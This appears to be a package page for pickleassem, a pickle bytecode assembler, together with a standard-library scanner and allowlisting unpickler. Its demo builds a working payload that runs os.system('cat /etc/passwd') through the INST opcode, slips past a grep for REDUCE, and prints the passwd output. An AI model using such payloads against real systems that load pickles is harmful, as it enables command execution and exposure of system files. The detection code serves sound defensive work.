pickleassem
A simple pickle assembler to make handcrafting pickle bytecode easier.
Demo
import pickle
import pickletools
from pickleassem import PickleAssembler

# Assemble a protocol-4 stream by hand: MARK, a string argument, then INST,
# which builds an instance of os.system with the marked arguments.
pa = PickleAssembler(proto=4)
pa.push_mark()
pa.push_short_binunicode('cat /etc/passwd')
pa.build_inst('os', 'system')
payload = pa.assemble()

# INST reaches a callable without the REDUCE opcode, so a byte-grep for b'R' finds nothing.
assert b'R' not in payload
print(payload)
pickletools.dis(payload, annotate=1)
pickle.loads(payload)
Output:
b'\x80\x04(\x8c\x0fcat /etc/passwdios\nsystem\n.'
0: \x80 PROTO 4 Protocol version indicator.
2: ( MARK Push markobject onto the stack.
3: \x8c SHORT_BINUNICODE 'cat /etc/passwd' Push a Python Unicode string object.
20: i INST 'os system' (MARK at 2) Build a class instance.
31: . STOP Stop the unpickling machine.
highest protocol among opcodes = 4
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
0
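The `assert b'R' not in payload` line above is the point of the demo: grepping a stream for the REDUCE opcode is not a meaningful check, because INST, OBJ, NEWOBJ and BUILD reach callables too. The following example is added here and is not part of pickleassem; it uses only the standard library. It walks the opcode stream with `pickletools.genops` to flag every callable-reaching opcode, and wraps `pickle.Unpickler` with an allowlisted `find_class`, which INST, OBJ, GLOBAL and STACK_GLOBAL all pass through. The sample streams are constructed for the example; the INST one has the same shape as the demo but targets `builtins.len`, so loading it only computes `len("hello")`.

```python
import io
import pickle
import pickletools

# Opcodes that resolve a global or invoke a callable during unpickling.
# A 'b"R" not in payload' test covers only REDUCE and misses every other entry.
CALL_OPCODES = frozenset({
    "GLOBAL", "STACK_GLOBAL",              # import module.name
    "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",  # instantiate (i.e. call) a class
    "REDUCE",                              # call callable(*args)
    "BUILD",                               # may call __setstate__
})


def naive_check(data: bytes) -> bool:
    """The byte-grep check from the demo: only spots the REDUCE opcode byte."""
    return b"R" in data


def scan_pickle(data: bytes) -> list:
    """Return (offset, opcode name) for each opcode that can reach a callable.
    genops parses the stream without executing it and works for any protocol."""
    return [(pos, op.name) for op, _arg, pos in pickletools.genops(data)
            if op.name in CALL_OPCODES]


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler whose find_class() honours an explicit (module, name) allowlist.
    INST, OBJ, GLOBAL and STACK_GLOBAL all resolve through find_class, so the
    INST construction used in the demo is stopped here as well."""

    def __init__(self, file, allowed):
        super().__init__(file)
        self.allowed = frozenset(allowed)

    def find_class(self, module, name):
        if (module, name) in self.allowed:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes, allowed=()):
    """pickle.loads with a global allowlist; raises UnpicklingError otherwise."""
    return RestrictedUnpickler(io.BytesIO(data), allowed).load()


# Constructed sample: PROTO 4, MARK, SHORT_BINUNICODE 'hello', INST builtins len, STOP.
# Same layout as the demo, but the callable is builtins.len and no b'R' byte appears.
INST_SAMPLE = b"\x80\x04(\x8c\x05hello" + b"ibuiltins\nlen\n."

# Constructed benign sample: a plain dict, which needs no globals at all.
BENIGN_SAMPLE = pickle.dumps({"user": "alice", "count": 3}, protocol=4)


def demo() -> dict:
    """Run the checks against both samples and collect the outcomes."""
    results = {
        "naive_misses_inst": not naive_check(INST_SAMPLE),
        "scan_flags_inst": scan_pickle(INST_SAMPLE),        # [(10, 'INST')]
        "scan_benign": scan_pickle(BENIGN_SAMPLE),          # []
        "allowlisted_load": safe_loads(INST_SAMPLE, {("builtins", "len")}),  # 5
    }
    try:
        safe_loads(INST_SAMPLE)  # empty allowlist: INST's find_class call is refused
        results["blocked"] = False
    except pickle.UnpicklingError:
        results["blocked"] = True
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

`scan_pickle` is the static check to run on untrusted data before any `loads`; `safe_loads` is the runtime guard when a pickle from an untrusted source must be loaded at all, and its allowlist should name only the handful of classes the application genuinely expects.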
Installation
Install with pip: pip install -U pickleassem
Documentation
Just refer to the source code. Each method of PickleAssembler whose name begins with push, build, pop or memo corresponds to a pickle opcode.
The following opcodes and corresponding features are not implemented: PERSID, BINPERSID, EXT1, EXT2, EXT4, FRAME, NEXT_BUFFER, READONLY_BUFFER.
See Also
Other tools for pickle exploitation:
anapickle: slides, repo
pwnypack.pickle
Download files
Source Distribution: pickleassem-1.0.0.tar.gz (8.3 kB)
Built Distribution: pickleassem-1.0.0-py3-none-any.whl
Hashes for pickleassem-1.0.0-py3-none-any.whl
Algorithm | Hash digest
---|---
SHA256 | 1d833a0f419d6d7a1d9367396645c43be320e60d873b79cab23b22825e75f095
MD5 | 60789fe34c03cf7992b33f5b771f0256
BLAKE2b-256 | b501f816c5b5e5f92abb6589661c40d99e05a04488c64001f7feec986ca50825